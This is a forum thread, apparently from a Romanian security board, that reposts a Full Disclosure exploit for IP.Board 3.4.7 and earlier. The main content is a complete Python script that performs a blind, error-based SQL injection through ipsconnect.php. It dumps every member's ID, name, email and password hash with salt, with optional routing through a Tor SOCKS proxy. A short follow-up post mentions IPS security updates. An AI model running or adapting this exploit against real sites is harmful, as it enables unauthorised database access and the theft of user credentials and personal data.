Jump to content
Nytro

IP.Board <= 3.4.7 SQL Injection

By Nytro, in Exploituri

Recommended Posts

Nytro Mentor

Nytro

Posted
Posted

IP.Board <= 3.4.7 SQL Injection

#!/usr/bin/env python
# Sunday, November 09, 2014 - secthrowaway () safe-mail net
# IP.Board <= 3.4.7 SQLi (blind, error based); 
# you can adapt to other types of blind injection if 'cache/sql_error_latest.cgi' is unreadable

url = 'http://target.tld/forum/'
ua = "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.17 Safari/537.36"

import sys, re

# <socks> - http://sourceforge.net/projects/socksipy/
#import socks, socket
#socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, "127.0.0.1", 9050)
#socket.socket = socks.socksocket
# </socks>

import urllib2, urllib

def inject(sql):
    try:
        urllib2.urlopen(urllib2.Request('%sinterface/ipsconnect/ipsconnect.php' % url, data="act=login&idType=id&id[]=-1&id[]=%s" % urllib.quote('-1) and 1!="\'" and extractvalue(1,concat(0x3a,(%s)))#\'' % sql), headers={"User-agent": ua}))
    except urllib2.HTTPError, e:
        if e.code == 503:
            data = urllib2.urlopen(urllib2.Request('%scache/sql_error_latest.cgi' % url, headers={"User-agent": ua})).read()
            txt = re.search("XPATH syntax error: '.*)'", data, re.MULTILINE)
            if txt is not None: 
                return txt.group(1)
            sys.exit('Error [3], received unexpected data:\n%s' % data)
        sys.exit('Error [1]')
    sys.exit('Error [2]')

def get(name, table, num):
    sqli = 'SELECT %s FROM %s LIMIT %d,1' % (name, table, num)
    s = int(inject('LENGTH((%s))' % sqli))
    if s < 31:
        return inject(sqli)
    else:
        r = ''
        for i in range(1, s+1, 31):
            r += inject('SUBSTRING((%s), %i, %i)' % (sqli, i, 31))
        return r

n = inject('SELECT COUNT(*) FROM members')
print '* Found %s users' % n
for j in range(int(n)):    
    print get('member_id', 'members', j)
    print get('name', 'members', j)
    print get('email', 'members', j)
    print get('CONCAT(members_pass_hash, 0x3a, members_pass_salt)', 'members', j)
    print '----------------'

Sursa: Full Disclosure: IP.Board <= 3.4.7 SQL Injection

Nytro Mentor

Nytro

Posted
  • Author
Posted

Pentru cei care se plang de vBulletin: "This year, IPS released a total of four security updates to address cross-site scripting (XSS), file inclusion and other vulnerabilities found in IP.Board."

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...